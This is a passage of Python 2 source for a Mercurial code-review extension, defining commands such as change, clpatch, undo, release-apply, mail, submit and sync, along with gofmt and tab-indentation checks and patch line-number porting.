				ui.warn("error: %s is excluded by .hgignore; omitting\n" % (f,))
				continue
			if f in clean:
				ui.warn("warning: %s is listed in the CL but unchanged\n" % (f,))
				files.append(f)
				continue
			p = repo.root + '/' + f
			if os.path.isfile(p):
				ui.warn("warning: %s is a file but not known to hg\n" % (f,))
				files.append(f)
				continue
			if os.path.isdir(p):
				ui.warn("error: %s is a directory, not a file; omitting\n" % (f,))
				continue
			ui.warn("error: %s does not exist; omitting\n" % (f,))
		clx.files = files
		# The edit was accepted: copy it into the caller's CL.
		cl.desc = clx.desc
		cl.reviewer = clx.reviewer
		cl.cc = clx.cc
		cl.files = clx.files
		cl.private = clx.private
		break
	return ""
# For use by submit, etc. (NOT by change)
# Get change list number or list of files from command line.
# If files are given, make a new change list.
# Returns (cl, err); err is "" on success.
def CommandLineCL(ui, repo, pats, opts, defaultcc=None):
	if len(pats) > 0 and GoodCLName(pats[0]):
		# An existing CL number was named on the command line.
		if len(pats) != 1:
			return None, "cannot specify change number and file names"
		if opts.get('message'):
			return None, "cannot use -m with existing CL"
		cl, err = LoadCL(ui, repo, pats[0], web=True)
		if err != "":
			return None, err
	else:
		# Make a fresh CL covering the files the patterns match.
		cl = CL("new")
		cl.local = True
		cl.files = ChangedFiles(ui, repo, pats, opts, taken=Taken(ui, repo))
		if not cl.files:
			return None, "no files changed"
	if opts.get('reviewer'):
		cl.reviewer = Add(cl.reviewer, SplitCommaSpace(opts.get('reviewer')))
	if opts.get('cc'):
		cl.cc = Add(cl.cc, SplitCommaSpace(opts.get('cc')))
	if defaultcc:
		cl.cc = Add(cl.cc, defaultcc)
	if cl.name == "new":
		# New CLs need a description: from -m or the editor.
		if opts.get('message'):
			cl.desc = opts.get('message')
		else:
			err = EditCL(ui, repo, cl)
			if err != '':
				return None, err
	return cl, ""
# reposetup replaces cmdutil.match with this wrapper,
# which expands the syntax @clnumber to mean the files
# in that CL.
original_match = None
def ReplacementForCmdutilMatch(repo, pats=None, opts=None, globbed=False, default='relpath'):
	taken = []
	files = []
	pats = pats or []
	opts = opts or {}
	for p in pats:
		if p.startswith('@'):
			# @NNNNN: replace with the files listed in CL NNNNN.
			taken.append(p)
			clname = p[1:]
			if not GoodCLName(clname):
				raise util.Abort("invalid CL name " + clname)
			cl, err = LoadCL(repo.ui, repo, clname, web=False)
			if err != '':
				raise util.Abort("loading CL " + clname + ": " + err)
			if not cl.files:
				raise util.Abort("no files in CL " + clname)
			files = Add(files, cl.files)
	# Swap the @-patterns for explicit path: patterns.
	pats = Sub(pats, taken) + ['path:'+f for f in files]
	# work-around for http://selenic.com/hg/rev/785bbc8634f8
	if hgversion >= '1.9' and not hasattr(repo, 'match'):
		repo = repo[None]
	return original_match(repo, pats=pats, opts=opts, globbed=globbed, default=default)
# Return path relative to cwd when path lies strictly inside cwd;
# otherwise return path unchanged.
def RelativePath(path, cwd):
	# Require the '/' as part of the prefix test. This keeps the
	# old behavior for e.g. cwd="/a/b" vs path="/a/bc/x" (no match)
	# and fixes an IndexError: the previous code read path[len(cwd)]
	# unconditionally, which blew up when path == cwd exactly.
	if path.startswith(cwd + '/'):
		return path[len(cwd)+1:]
	return path
# Run the formatting checks (gofmt for Go, tab indentation for C)
# over files. With just_warn, problems warn instead of aborting.
def CheckFormat(ui, repo, files, just_warn=False):
	set_status("running gofmt")
	CheckGofmt(ui, repo, files, just_warn)
	CheckTabfmt(ui, repo, files, just_warn)
# Check that gofmt run on the list of files does not change them
def CheckGofmt(ui, repo, files, just_warn):
	# Only Go sources under src/ or test/bench/ are checked.
	files = [f for f in files if (f.startswith('src/') or f.startswith('test/bench/')) and f.endswith('.go')]
	if not files:
		return
	cwd = os.getcwd()
	files = [RelativePath(repo.root + '/' + f, cwd) for f in files]
	# Skip files that no longer exist on disk.
	files = [f for f in files if os.access(f, 0)]
	if not files:
		return
	try:
		cmd = subprocess.Popen(["gofmt", "-l"] + files, shell=False, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=sys.platform != "win32")
		cmd.stdin.close()
	except:
		raise util.Abort("gofmt: " + ExceptionDetail())
	data = cmd.stdout.read()
	errors = cmd.stderr.read()
	cmd.wait()
	set_status("done with gofmt")
	if len(errors) > 0:
		ui.warn("gofmt errors:\n" + errors.rstrip() + "\n")
		return
	if len(data) > 0:
		# gofmt -l printed file names: those need reformatting.
		msg = "gofmt needs to format these files (run hg gofmt):\n" + Indent(data, "\t").rstrip()
		if just_warn:
			ui.warn("warning: " + msg + "\n")
		else:
			raise util.Abort(msg)
	return
# Check that *.[chys] files indent using tabs.
def CheckTabfmt(ui, repo, files, just_warn):
	# Only C/assembly-style sources under src/ are checked.
	files = [f for f in files if f.startswith('src/') and re.search(r"\.[chys]$", f)]
	if not files:
		return
	cwd = os.getcwd()
	files = [RelativePath(repo.root + '/' + f, cwd) for f in files]
	files = [f for f in files if os.access(f, 0)]
	badfiles = []
	for f in files:
		try:
			for line in open(f, 'r'):
				# Four leading spaces is enough to complain about,
				# except that some Plan 9 code uses four spaces as the label indent,
				# so allow that.
				if line.startswith(' ') and not re.match(' [A-Za-z0-9_]+:', line):
					badfiles.append(f)
					break
		except:
			# ignore cannot open file, etc.
			pass
	if len(badfiles) > 0:
		msg = "these files use spaces for indentation (use tabs instead):\n\t" + "\n\t".join(badfiles)
		if just_warn:
			ui.warn("warning: " + msg + "\n")
		else:
			raise util.Abort(msg)
	return
#######################################################################
# Mercurial commands
# every command must take a ui and a repo as arguments.
# opts is a dict where you can find other command line flags
#
# Other parameters are taken in order from items on the command line that
# don't start with a dash. If no default value is given in the parameter list,
# they are required.
#
def change(ui, repo, *pats, **opts):
	"""create, edit or delete a change list
	Create, edit or delete a change list.
	A change list is a group of files to be reviewed and submitted together,
	plus a textual description of the change.
	Change lists are referred to by simple alphanumeric names.
	Changes must be reviewed before they can be submitted.
	In the absence of options, the change command opens the
	change list for editing in the default editor.
	Deleting a change with the -d or -D flag does not affect
	the contents of the files listed in that change. To revert
	the files listed in a change, use
	hg revert @123456
	before running hg change -d 123456.
	"""
	if missing_codereview:
		return missing_codereview
	# dirty maps CL -> True for CLs that must be flushed to disk.
	dirty = {}
	if len(pats) > 0 and GoodCLName(pats[0]):
		# Operating on an existing CL named on the command line.
		name = pats[0]
		if len(pats) != 1:
			return "cannot specify CL name and file patterns"
		pats = pats[1:]
		cl, err = LoadCL(ui, repo, name, web=True)
		if err != '':
			return err
		if not cl.local and (opts["stdin"] or not opts["stdout"]):
			return "cannot change non-local CL " + name
	else:
		# Creating a new CL from the matched changed files.
		if repo[None].branch() != "default":
			return "cannot run hg change outside default branch"
		name = "new"
		cl = CL("new")
		dirty[cl] = True
		files = ChangedFiles(ui, repo, pats, opts, taken=Taken(ui, repo))
	if opts["delete"] or opts["deletelocal"]:
		# -d abandons the CL on the server too; -D is local-only.
		if opts["delete"] and opts["deletelocal"]:
			return "cannot use -d and -D together"
		flag = "-d"
		if opts["deletelocal"]:
			flag = "-D"
		if name == "new":
			return "cannot use "+flag+" with file patterns"
		if opts["stdin"] or opts["stdout"]:
			return "cannot use "+flag+" with -i or -o"
		if not cl.local:
			return "cannot change non-local CL " + name
		if opts["delete"]:
			if cl.copied_from:
				return "original author must delete CL; hg change -D will remove locally"
			PostMessage(ui, cl.name, "*** Abandoned ***", send_mail=cl.mailed)
			EditDesc(cl.name, closed=True, private=cl.private)
		cl.Delete(ui, repo)
		return
	if opts["stdin"]:
		# -i: read the CL text from standard input; only fields
		# present in the input overwrite the loaded CL.
		s = sys.stdin.read()
		clx, line, err = ParseCL(s, name)
		if err != '':
			return "error parsing change list: line %d: %s" % (line, err)
		if clx.desc is not None:
			cl.desc = clx.desc;
			dirty[cl] = True
		if clx.reviewer is not None:
			cl.reviewer = clx.reviewer
			dirty[cl] = True
		if clx.cc is not None:
			cl.cc = clx.cc
			dirty[cl] = True
		if clx.files is not None:
			cl.files = clx.files
			dirty[cl] = True
		if clx.private != cl.private:
			cl.private = clx.private
			dirty[cl] = True
	if not opts["stdin"] and not opts["stdout"]:
		# Interactive path: open the CL text in the editor.
		if name == "new":
			cl.files = files
		err = EditCL(ui, repo, cl)
		if err != "":
			return err
		dirty[cl] = True
	for d, _ in dirty.items():
		name = d.name
		d.Flush(ui, repo)
		if name == "new":
			# First upload assigns a real issue number on the server.
			d.Upload(ui, repo, quiet=True)
	if opts["stdout"]:
		ui.write(cl.EditorText())
	elif opts["pending"]:
		ui.write(cl.PendingText())
	elif name == "new":
		if ui.quiet:
			ui.write(cl.name)
		else:
			ui.write("CL created: " + cl.url + "\n")
	return
def code_login(ui, repo, **opts):
	"""log in to code review server
	Logs in to the code review server, saving a cookie in
	a file in your home directory.
	"""
	if missing_codereview:
		return missing_codereview
	# MySend (Rietveld RPC helper, defined elsewhere in this file)
	# performs the authentication round trip as a side effect,
	# which saves the login cookie.
	MySend(None)
def clpatch(ui, repo, clname, **opts):
	"""import a patch from the code review server
	Imports a patch from the code review server into the local client.
	If the local client has already modified any of the files that the
	patch modifies, this command will refuse to apply the patch.
	Submitting an imported patch will keep the original author's
	name as the Author: line but add your own name to a Committer: line.
	"""
	# Patches are always applied against mainline; refuse elsewhere.
	if repo[None].branch() != "default":
		return "cannot run hg clpatch outside default branch"
	return clpatch_or_undo(ui, repo, clname, opts, mode="clpatch")
def undo(ui, repo, clname, **opts):
	"""undo the effect of a CL
	Creates a new CL that undoes an earlier CL.
	After creating the CL, opens the CL text for editing so that
	you can add the reason for the undo to the description.
	"""
	# Undo CLs are always created against mainline; refuse elsewhere.
	if repo[None].branch() != "default":
		return "cannot run hg undo outside default branch"
	return clpatch_or_undo(ui, repo, clname, opts, mode="undo")
def release_apply(ui, repo, clname, **opts):
	"""apply a CL to the release branch
	Creates a new CL copying a previously committed change
	from the main branch to the release branch.
	The current client must either be clean or already be in
	the release branch.
	The release branch must be created by starting with a
	clean client, disabling the code review plugin, and running:
	hg update weekly.YYYY-MM-DD
	hg branch release-branch.rNN
	hg commit -m 'create release-branch.rNN'
	hg push --new-branch
	Then re-enable the code review plugin.
	People can test the release branch by running
	hg update release-branch.rNN
	in a clean client. To return to the normal tree,
	hg update default
	Move changes since the weekly into the release branch
	using hg release-apply followed by the usual code review
	process and hg submit.
	When it comes time to tag the release, record the
	final long-form tag of the release-branch.rNN
	in the *default* branch's .hgtags file. That is, run
	hg update default
	and then edit .hgtags as you would for a weekly.
	"""
	c = repo[None]
	if not releaseBranch:
		return "no active release branches"
	if c.branch() != releaseBranch:
		# Switch to the release branch, but only from a clean client.
		if c.modified() or c.added() or c.removed():
			raise util.Abort("uncommitted local changes - cannot switch branches")
		err = hg.clean(repo, releaseBranch)
		if err:
			return err
	try:
		err = clpatch_or_undo(ui, repo, clname, opts, mode="backport")
		if err:
			raise util.Abort(err)
	# (Python 2 except syntax.) On any failure, put the client
	# back on the default branch before propagating the error.
	except Exception, e:
		hg.clean(repo, "default")
		raise e
	return None
def rev2clname(rev):
	# Extract CL name from revision description.
	# The last line in the description that is a codereview URL is the real one.
	# Earlier lines might be part of the user-written description.
	matches = re.findall('(?m)^http://codereview.appspot.com/([0-9]+)$', rev.description())
	if matches:
		return matches[-1]
	return ""
# Description templates for undo and backport (release-apply) CLs;
# the «««/»»» markers bracket the quoted original CL description.
undoHeader = """undo CL %s / %s
<enter reason for undo>
««« original CL description
"""
undoFooter = """
»»»
"""
backportHeader = """[%s] %s
««« CL %s / %s
"""
backportFooter = """
»»»
"""
# Implementation of clpatch/undo.
# Shared body for hg clpatch, hg undo and hg release-apply;
# mode is "clpatch", "undo", or "backport". Returns an error
# string, or None/falls off the end on success.
def clpatch_or_undo(ui, repo, clname, opts, mode):
	if missing_codereview:
		return missing_codereview
	if mode == "undo" or mode == "backport":
		if hgversion < '1.4':
			# Don't have cmdutil.match (see implementation of sync command).
			return "hg is too old to run hg %s - update to 1.4 or newer" % mode
		# Find revision in Mercurial repository.
		# Assume CL number is 7+ decimal digits.
		# Otherwise is either change log sequence number (fewer decimal digits),
		# hexadecimal hash, or tag name.
		# Mercurial will fall over long before the change log
		# sequence numbers get to be 7 digits long.
		if re.match('^[0-9]{7,}$', clname):
			found = False
			matchfn = scmutil.match(repo, [], {'rev': None})
			def prep(ctx, fns):
				pass
			for ctx in cmdutil.walkchangerevs(repo, matchfn, {'rev': None}, prep):
				rev = repo[ctx.rev()]
				# Last line with a code review URL is the actual review URL.
				# Earlier ones might be part of the CL description.
				n = rev2clname(rev)
				if n == clname:
					found = True
					break
			if not found:
				return "cannot find CL %s in local repository" % clname
		else:
			rev = repo[clname]
			if not rev:
				return "unknown revision %s" % clname
			clname = rev2clname(rev)
			if clname == "":
				return "cannot find CL name in revision description"
		# Create fresh CL and start with patch that would reverse the change.
		vers = short(rev.node())
		cl = CL("new")
		desc = str(rev.description())
		if mode == "undo":
			cl.desc = (undoHeader % (clname, vers)) + desc + undoFooter
		else:
			# NOTE(review): appends undoFooter where backportFooter looks
			# intended; the two strings are currently identical, so no
			# behavior difference today.
			cl.desc = (backportHeader % (releaseBranch, line1(desc), clname, vers)) + desc + undoFooter
		v1 = vers
		v0 = short(rev.parents()[0].node())
		if mode == "undo":
			# undo: diff from the change back down to its parent.
			arg = v1 + ":" + v0
		else:
			# backport: apply the change forward on the release branch.
			vers = v0
			arg = v0 + ":" + v1
		patch = RunShell(["hg", "diff", "--git", "-r", arg])
	else: # clpatch
		cl, vers, patch, err = DownloadCL(ui, repo, clname)
		if err != "":
			return err
		if patch == emptydiff:
			return "codereview issue %s has no diff" % clname
	# find current hg version (hg identify)
	ctx = repo[None]
	parents = ctx.parents()
	id = '+'.join([short(p.node()) for p in parents])
	# if version does not match the patch version,
	# try to update the patch line numbers.
	if vers != "" and id != vers:
		# "vers in repo" gives the wrong answer
		# on some versions of Mercurial. Instead, do the actual
		# lookup and catch the exception.
		try:
			repo[vers].description()
		except:
			return "local repository is out of date; sync to get %s" % (vers)
		patch1, err = portPatch(repo, patch, vers, id)
		if err != "":
			if not opts["ignore_hgpatch_failure"]:
				return "codereview issue %s is out of date: %s (%s->%s)" % (clname, err, vers, id)
		else:
			patch = patch1
	# Pipe the (possibly ported) patch through the hgpatch tool.
	argv = ["hgpatch"]
	if opts["no_incoming"] or mode == "backport":
		argv += ["--checksync=false"]
	try:
		cmd = subprocess.Popen(argv, shell=False, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=None, close_fds=sys.platform != "win32")
	except:
		return "hgpatch: " + ExceptionDetail()
	out, err = cmd.communicate(patch)
	if cmd.returncode != 0 and not opts["ignore_hgpatch_failure"]:
		return "hgpatch failed"
	cl.local = True
	# hgpatch prints the files it touched; those become the CL's files.
	cl.files = out.strip().split()
	if not cl.files and not opts["ignore_hgpatch_failure"]:
		return "codereview issue %s has no changed files" % clname
	files = ChangedFiles(ui, repo, [], opts)
	extra = Sub(cl.files, files)
	if extra:
		ui.warn("warning: these files were listed in the patch but not changed:\n\t" + "\n\t".join(extra) + "\n")
	cl.Flush(ui, repo)
	if mode == "undo":
		# Let the user record the reason for the undo.
		err = EditCL(ui, repo, cl)
		if err != "":
			return "CL created, but error editing: " + err
		cl.Flush(ui, repo)
	else:
		ui.write(cl.PendingText() + "\n")
# portPatch rewrites patch from being a patch against
# oldver to being a patch against newver.
# Returns (newpatch, "") on success; on failure the second value
# is a non-empty error string (callers only test err != "").
def portPatch(repo, patch, oldver, newver):
	lines = patch.splitlines(True) # True = keep \n
	delta = None
	for i in range(len(lines)):
		line = lines[i]
		if line.startswith('--- a/'):
			# Start of a new file section: recompute its deltas.
			file = line[6:-1]
			delta = fileDeltas(repo, file, oldver, newver)
		if not delta or not line.startswith('@@ '):
			continue
		# @@ -x,y +z,w @@ means the patch chunk replaces
		# the original file's line numbers x up to x+y with the
		# line numbers z up to z+w in the new file.
		# Find the delta from x in the original to the same
		# line in the current version and add that delta to both
		# x and z.
		m = re.match('@@ -([0-9]+),([0-9]+) \+([0-9]+),([0-9]+) @@', line)
		if not m:
			# NOTE(review): returns None here but "" at the next error
			# exit; harmless since callers only inspect the err string.
			return None, "error parsing patch line numbers"
		n1, len1, n2, len2 = int(m.group(1)), int(m.group(2)), int(m.group(3)), int(m.group(4))
		d, err = lineDelta(delta, n1, len1)
		if err != "":
			return "", err
		n1 += d
		n2 += d
		lines[i] = "@@ -%d,%d +%d,%d @@\n" % (n1, len1, n2, len2)
	newpatch = ''.join(lines)
	return newpatch, ""
# fileDelta returns the line number deltas for the given file's
# changes from oldver to newver.
# The deltas are a list of (n, len, newdelta) triples that say
# lines [n, n+len) were modified, and after that range the
# line numbers are +newdelta from what they were before.
def fileDeltas(repo, file, oldver, newver):
	diff = RunShell(["hg", "diff", "--git", "-r", oldver + ":" + newver, "path:" + file], silent_ok=True)
	deltas = []
	for line in diff.splitlines():
		# Only hunk headers contribute line-number information.
		m = re.match('@@ -([0-9]+),([0-9]+) \+([0-9]+),([0-9]+) @@', line)
		if m is None:
			continue
		n1, len1, n2, len2 = [int(g) for g in m.groups()]
		deltas.append((n1, len1, n2+len2-(n1+len1)))
	return deltas
# lineDelta finds the appropriate line number delta to apply to the lines [n, n+len).
# It returns an error if those lines were rewritten by the patch.
# deltas is the (n, len, newdelta) list produced by fileDeltas,
# in ascending line order. (The parameter name "len" shadows the
# builtin; kept unchanged for caller compatibility.)
def lineDelta(deltas, n, len):
	d = 0
	for (old, oldlen, newdelta) in deltas:
		if old >= n+len:
			# Deltas are ordered; nothing at or past the end of
			# the hunk can affect it.
			break
		if old+oldlen > n:
			# Bug fix: the overlap test must use the modified
			# range's own length (oldlen), not the hunk length
			# (len); the old test missed conflicts when the
			# hunk was shorter than the modified range's offset.
			return 0, "patch and recent changes conflict"
		d = newdelta
	return d, ""
def download(ui, repo, clname, **opts):
	"""download a change from the code review server
	Download prints a description of the given change list
	followed by its diff, downloaded from the code review server.
	"""
	if missing_codereview:
		return missing_codereview
	# DownloadCL returns (cl, version, patch text, err).
	cl, vers, patch, err = DownloadCL(ui, repo, clname)
	if err != "":
		return err
	ui.write(cl.EditorText() + "\n")
	ui.write(patch + "\n")
	return
def file(ui, repo, clname, pat, *pats, **opts):
	"""assign files to or remove files from a change list
	Assign files to or (with -d) remove files from a change list.
	The -d option only removes files from the change list.
	It does not edit them or remove them from the repository.
	"""
	if missing_codereview:
		return missing_codereview
	pats = tuple([pat] + list(pats))
	if not GoodCLName(clname):
		return "invalid CL name " + clname
	# dirty maps CL -> True for CLs needing a Flush at the end.
	dirty = {}
	cl, err = LoadCL(ui, repo, clname, web=False)
	if err != '':
		return err
	if not cl.local:
		return "cannot change non-local CL " + clname
	files = ChangedFiles(ui, repo, pats, opts)
	if opts["delete"]:
		# -d: remove matching files from this CL only.
		oldfiles = Intersect(files, cl.files)
		if oldfiles:
			if not ui.quiet:
				# Print the commands that would undo this removal.
				ui.status("# Removing files from CL. To undo:\n")
				ui.status("# cd %s\n" % (repo.root))
				for f in oldfiles:
					ui.status("# hg file %s %s\n" % (cl.name, f))
			cl.files = Sub(cl.files, oldfiles)
			cl.Flush(ui, repo)
		else:
			ui.status("no such files in CL")
		return
	if not files:
		return "no such modified files"
	files = Sub(files, cl.files)
	taken = Taken(ui, repo)
	warned = False
	for f in files:
		if f in taken:
			# Steal the file from the CL that currently claims it.
			if not warned and not ui.quiet:
				ui.status("# Taking files from other CLs. To undo:\n")
				ui.status("# cd %s\n" % (repo.root))
				warned = True
			ocl = taken[f]
			if not ui.quiet:
				ui.status("# hg file %s %s\n" % (ocl.name, f))
			if ocl not in dirty:
				ocl.files = Sub(ocl.files, files)
				dirty[ocl] = True
	cl.files = Add(cl.files, files)
	dirty[cl] = True
	for d, _ in dirty.items():
		d.Flush(ui, repo)
	return
def gofmt(ui, repo, *pats, **opts):
	"""apply gofmt to modified files
	Applies gofmt to the modified files in the repository that match
	the given patterns.
	"""
	if missing_codereview:
		return missing_codereview
	files = ChangedExistingFiles(ui, repo, pats, opts)
	files = [f for f in files if f.endswith(".go")]
	if not files:
		return "no modified go files"
	cwd = os.getcwd()
	files = [RelativePath(repo.root + '/' + f, cwd) for f in files]
	try:
		cmd = ["gofmt", "-l"]
		if not opts["list"]:
			# Default mode rewrites files in place; --list only lists.
			cmd += ["-w"]
		if os.spawnvp(os.P_WAIT, "gofmt", cmd + files) != 0:
			raise util.Abort("gofmt did not exit cleanly")
	# (Python 2 except syntax.) Let deliberate aborts pass through.
	except error.Abort, e:
		raise
	except:
		raise util.Abort("gofmt: " + ExceptionDetail())
	return
def mail(ui, repo, *pats, **opts):
	"""mail a change for review
	Uploads a patch to the code review server and then sends mail
	to the reviewer and CC list asking for a review.
	"""
	if missing_codereview:
		return missing_codereview
	cl, err = CommandLineCL(ui, repo, pats, opts, defaultcc=defaultcc)
	if err != "":
		return err
	cl.Upload(ui, repo, gofmt_just_warn=True)
	if not cl.reviewer:
		# If no reviewer is listed, assign the review to defaultcc.
		# This makes sure that it appears in the
		# codereview.appspot.com/user/defaultcc
		# page, so that it doesn't get dropped on the floor.
		if not defaultcc:
			return "no reviewers listed in CL"
		# Don't leave defaultcc on both the reviewer and CC lines.
		cl.cc = Sub(cl.cc, defaultcc)
		cl.reviewer = defaultcc
		cl.Flush(ui, repo)
	if cl.files == []:
		return "no changed files, not sending mail"
	cl.Mail(ui, repo)
def pending(ui, repo, *pats, **opts):
	"""show pending changes
	Lists pending changes followed by a list of unassigned but modified files.
	"""
	if missing_codereview:
		return missing_codereview
	m = LoadAllCL(ui, repo, web=True)
	# Print CLs in name order. (Python 2: keys() returns a list.)
	names = m.keys()
	names.sort()
	for name in names:
		cl = m[name]
		ui.write(cl.PendingText() + "\n")
	files = DefaultFiles(ui, repo, [], opts)
	if len(files) > 0:
		s = "Changed files not in any CL:\n"
		for f in files:
			s += "\t" + f + "\n"
		ui.write(s)
# Mercurial extension hook, called once per repository: install the
# @CL-number pattern expansion into scmutil.match (exactly once)
# and initialize the Rietveld connection state.
def reposetup(ui, repo):
	global original_match
	if original_match is None:
		start_status_thread()
		original_match = scmutil.match
		scmutil.match = ReplacementForCmdutilMatch
		RietveldSetup(ui, repo)
def CheckContributor(ui, repo, user=None):
	# Like FindContributor, but failure to locate the user in the
	# CONTRIBUTORS file aborts instead of warning.
	set_status("checking CONTRIBUTORS file")
	user, userline = FindContributor(ui, repo, user, warn=False)
	if userline:
		return userline
	raise util.Abort("cannot find %s in CONTRIBUTORS" % (user,))
# Resolve user (default: the configured [ui] username) to a
# canonical (email, "Name <email>") pair via the contributors map.
# Returns (user, None) when the user is not listed.
def FindContributor(ui, repo, user=None, warn=True):
	if not user:
		user = ui.config("ui", "username")
		if not user:
			raise util.Abort("[ui] username is not configured in .hgrc")
	user = user.lower()
	# Accept "Name <email>" forms; keep just the address.
	m = re.match(r".*<(.*)>", user)
	if m:
		user = m.group(1)
	if user not in contributors:
		if warn:
			ui.warn("warning: cannot find %s in CONTRIBUTORS\n" % (user,))
		return user, None
	user, email = contributors[user]
	return email, "%s <%s>" % (user, email)
def submit(ui, repo, *pats, **opts):
	"""submit change to remote repository
	Submits change to remote repository.
	Bails out if the local repository is not in sync with the remote one.
	"""
	if missing_codereview:
		return missing_codereview
	# We already called this on startup but sometimes Mercurial forgets.
	set_mercurial_encoding_to_utf8()
	repo.ui.quiet = True
	if not opts["no_incoming"] and Incoming(ui, repo, opts):
		return "local repository out of date; must sync before submit"
	cl, err = CommandLineCL(ui, repo, pats, opts, defaultcc=defaultcc)
	if err != "":
		return err
	# check that authors are listed in CONTRIBUTORS
	user = None
	if cl.copied_from:
		user = cl.copied_from
	userline = CheckContributor(ui, repo, user)
	typecheck(userline, str)
	# Build the R=/TBR=/CC= trailer appended to the commit message.
	about = ""
	if cl.reviewer:
		about += "R=" + JoinComma([CutDomain(s) for s in cl.reviewer]) + "\n"
	if opts.get('tbr'):
		tbr = SplitCommaSpace(opts.get('tbr'))
		cl.reviewer = Add(cl.reviewer, tbr)
		about += "TBR=" + JoinComma([CutDomain(s) for s in tbr]) + "\n"
	if cl.cc:
		about += "CC=" + JoinComma([CutDomain(s) for s in cl.cc]) + "\n"
	if not cl.reviewer:
		return "no reviewers listed in CL"
	if not cl.local:
		return "cannot submit non-local CL"
	# upload, to sync current patch and also get change number if CL is new.
	if not cl.copied_from:
		cl.Upload(ui, repo, gofmt_just_warn=True)
	# check gofmt for real; allowed upload to warn in order to save CL.
	cl.Flush(ui, repo)
	CheckFormat(ui, repo, cl.files)
	about += "%s%s\n" % (server_url_base, cl.name)
	if cl.copied_from:
		about += "\nCommitter: " + CheckContributor(ui, repo, None) + "\n"
	typecheck(about, str)
	if not cl.mailed and not cl.copied_from: # in case this is TBR
		cl.Mail(ui, repo)
	# submit changes locally
	date = opts.get('date')
	if date:
		opts['date'] = util.parsedate(date)
		typecheck(opts['date'], str)
	opts['message'] = cl.desc.rstrip() + "\n\n" + about
	typecheck(opts['message'], str)
	if opts['dryrun']:
		print "NOT SUBMITTING:"
		print "User: ", userline
		print "Message:"
		print Indent(opts['message'], "\t")
		print "Files:"
		print Indent('\n'.join(cl.files), "\t")
		return "dry run; not submitted"
	# Commit exactly the CL's files locally.
	m = match.exact(repo.root, repo.getcwd(), cl.files)
	node = repo.commit(ustr(opts['message']), ustr(userline), opts.get('date'), m)
	if not node:
		return "nothing changed"
	# push to remote; if it fails for any reason, roll back
	try:
		log = repo.changelog
		rev = log.rev(node)
		parents = log.parentrevs(rev)
		if (rev-1 not in parents and
			(parents == (nullrev, nullrev) or
			len(log.heads(log.node(parents[0]))) > 1 and
			(parents[1] == nullrev or len(log.heads(log.node(parents[1]))) > 1))):
			# created new head
			raise util.Abort("local repository out of date; must sync before submit")
		# push changes to remote.
		# if it works, we're committed.
		# if not, roll back
		other = getremote(ui, repo, opts)
		r = repo.push(other, False, None)
		if r == 0:
			raise util.Abort("local repository out of date; must sync before submit")
	except:
		# Undo the local commit before re-raising.
		real_rollback()
		raise
	# we're committed. upload final patch, close review, add commit message
	changeURL = short(node)
	url = other.url()
	m = re.match("^https?://([^@/]+@)?([^.]+)\.googlecode\.com/hg/?", url)
	if m:
		changeURL = "http://code.google.com/p/%s/source/detail?r=%s" % (m.group(2), changeURL)
	else:
		print >>sys.stderr, "URL: ", url
	pmsg = "*** Submitted as " + changeURL + " ***\n\n" + opts['message']
	# When posting, move reviewers to CC line,
	# so that the issue stops showing up in their "My Issues" page.
	PostMessage(ui, cl.name, pmsg, reviewers="", cc=JoinComma(cl.reviewer+cl.cc))
	if not cl.copied_from:
		EditDesc(cl.name, closed=True, private=cl.private)
	cl.Delete(ui, repo)
	# After a release-branch submit with a clean client, hop back
	# to the default branch.
	c = repo[None]
	if c.branch() == releaseBranch and not c.modified() and not c.added() and not c.removed():
		ui.write("switching from %s to default branch.\n" % releaseBranch)
		err = hg.clean(repo, "default")
		if err:
			return err
	return None
def sync(ui, repo, **opts):
	"""synchronize with remote repository

	Incorporates recent changes from the remote repository
	into the local repository.
	"""
	# missing_codereview is set by RietveldSetup when the extension
	# could not initialize; report that instead of doing anything.
	if missing_codereview:
		return missing_codereview

	if not opts["local"]:
		# Route pull's verbose output through sync_note, which keeps
		# the list of updated files but drops the progress chatter.
		ui.status = sync_note
		ui.note = sync_note
		other = getremote(ui, repo, opts)
		modheads = repo.pull(other)
		err = commands.postincoming(ui, repo, modheads, True, "tip")
		if err:
			return err
		commands.update(ui, repo, rev="default")
	# Close out any local CLs that Rietveld says were submitted.
	sync_changes(ui, repo)
def sync_note(msg):
	# sync runs pull -u in verbose mode to obtain the list of files
	# being updated, which drags along a handful of progress messages
	# we do not care about.  Swallow those; echo everything else.
	boring = (
		'resolving manifests\n',
		'searching for changes\n',
		"couldn't find merge tool hgmerge\n",
	)
	if msg not in boring:
		sys.stdout.write(msg)
def sync_changes(ui, repo):
	# Look through recent change log descriptions to find
	# potential references to http://.*/our-CL-number.
	# Double-check them by looking at the Rietveld log.
	def Rev(rev):
		# If this commit's description names a CL that Rietveld has
		# recorded as submitted for this commit, close the local CL.
		desc = repo[rev].description().strip()
		for clname in re.findall('(?m)^http://(?:[^\n]+)/([0-9]+)$', desc):
			if IsLocalCL(ui, repo, clname) and IsRietveldSubmitted(ui, clname, repo[rev].hex()):
				ui.warn("CL %s submitted as %s; closing\n" % (clname, repo[rev]))
				cl, err = LoadCL(ui, repo, clname, web=False)
				if err != "":
					ui.warn("loading CL %s: %s\n" % (clname, err))
					continue
				# CLs copied from someone else are not ours to close
				# on the server; just delete the local record.
				if not cl.copied_from:
					EditDesc(cl.name, closed=True, private=cl.private)
				cl.Delete(ui, repo)

	# Mercurial changed the walkchangerevs API in 1.4; pick the
	# matching iteration style.
	# NOTE(review): hgversion < '1.4' is a string comparison, which
	# would misorder e.g. '1.10' vs '1.4' — presumably fine for the
	# versions this targeted, but verify before reuse.
	if hgversion < '1.4':
		get = util.cachefunc(lambda r: repo[r].changeset())
		changeiter, matchfn = cmdutil.walkchangerevs(ui, repo, [], get, {'rev': None})
		n = 0
		for st, rev, fns in changeiter:
			if st != 'iter':
				continue
			n += 1
			# Only scan the 100 most recent changes.
			if n > 100:
				break
			Rev(rev)
	else:
		matchfn = scmutil.match(repo, [], {'rev': None})
		def prep(ctx, fns):
			pass
		for ctx in cmdutil.walkchangerevs(repo, matchfn, {'rev': None}, prep):
			Rev(ctx.rev())

	# Remove files that are not modified from the CLs in which they appear.
	all = LoadAllCL(ui, repo, web=False)
	changed = ChangedFiles(ui, repo, [], {})
	for _, cl in all.items():
		extra = Sub(cl.files, changed)
		if extra:
			ui.warn("Removing unmodified files from CL %s:\n" % (cl.name,))
			for f in extra:
				ui.warn("\t%s\n" % (f,))
			cl.files = Sub(cl.files, extra)
			cl.Flush(ui, repo)
		if not cl.files:
